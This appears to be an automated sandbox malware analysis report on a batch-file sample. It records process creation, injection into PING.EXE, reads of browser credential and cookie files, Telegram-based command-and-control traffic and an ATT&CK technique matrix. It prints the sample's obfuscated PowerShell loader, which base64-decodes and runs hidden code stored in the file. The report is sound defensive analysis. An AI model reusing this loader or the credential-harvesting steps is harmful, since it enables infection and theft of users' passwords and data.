                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /FJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -tJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -tJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w h -command "$wnordsralzoerijhddfkhpjtofov='c:\users\user\desktop\soa since oct dec 241738316681530012900.bat';$rluhfbonocrbktfaqykvsfefxskg=-254500..-1;$dvcyeviaehzptwtbldznjicpusdm=[system.text.encoding]::utf8.getstring([convert]::frombase64string((get-content $wnordsralzoerijhddfkhpjtofov -raw)[$rluhfbonocrbktfaqykvsfefxskg]));iex $dvcyeviaehzptwtbldznjicpusdm"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w h -command "$wnordsralzoerijhddfkhpjtofov='c:\users\user\desktop\soa since oct dec 241738316681530012900.bat';$rluhfbonocrbktfaqykvsfefxskg=-254500..-1;$dvcyeviaehzptwtbldznjicpusdm=[system.text.encoding]::utf8.getstring([convert]::frombase64string((get-content $wnordsralzoerijhddfkhpjtofov -raw)[$rluhfbonocrbktfaqykvsfefxskg]));iex $dvcyeviaehzptwtbldznjicpusdm"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                311
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)21
                Obfuscated Files or Information
                Security Account Manager11
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                Login HookLogin Hook1
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync1
                Remote System Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                Process Injection
                Proc Filesystem11
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637169 Sample: SOA Since OCT DEC 241738316... Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 41 reallyfreegeoip.org 2->41 43 api.telegram.org 2->43 45 2 other IPs or domains 2->45 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 63 17 other signatures 2->63 9 cmd.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 59 Tries to detect the country of the analysis system (by using the IP) 41->59 61 Uses the Telegram API (likely for C&C communication) 43->61 process4 signatures5 65 Suspicious powershell command line found 9->65 67 Uses ping.exe to check the status of other devices and networks 9->67 69 PowerShell case anomaly found 9->69 14 powershell.exe 29 9->14         started        18 conhost.exe 9->18         started        process6 file7 39 C:\Users\user\AppData\...\ilgwppf0.cmdline, Unicode 14->39 dropped 75 Writes to foreign memory regions 14->75 77 Creates a thread in another existing process (thread injection) 14->77 20 cmd.exe 1 14->20         started        22 csc.exe 3 14->22         started        25 taskkill.exe 1 14->25         started        27 conhost.exe 14->27         started        signatures8 process9 file10 29 PING.EXE 15 3 20->29         started        33 conhost.exe 20->33         started        37 C:\Users\user\AppData\Local\...\ilgwppf0.dll, PE32 22->37 dropped 35 cvtres.exe 1 22->35         started        process11 dnsIp12 47 127.0.0.1 unknown unknown 29->47 49 checkip.dyndns.com 132.226.8.169, 49682, 49688, 58058 UTMEMUS United States 29->49 51 2 other IPs or domains 29->51 71 Tries to steal Mail credentials (via file / registry access) 29->71 73 Tries to harvest and steal browser information (history, passwords, etc) 29->73 signatures13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.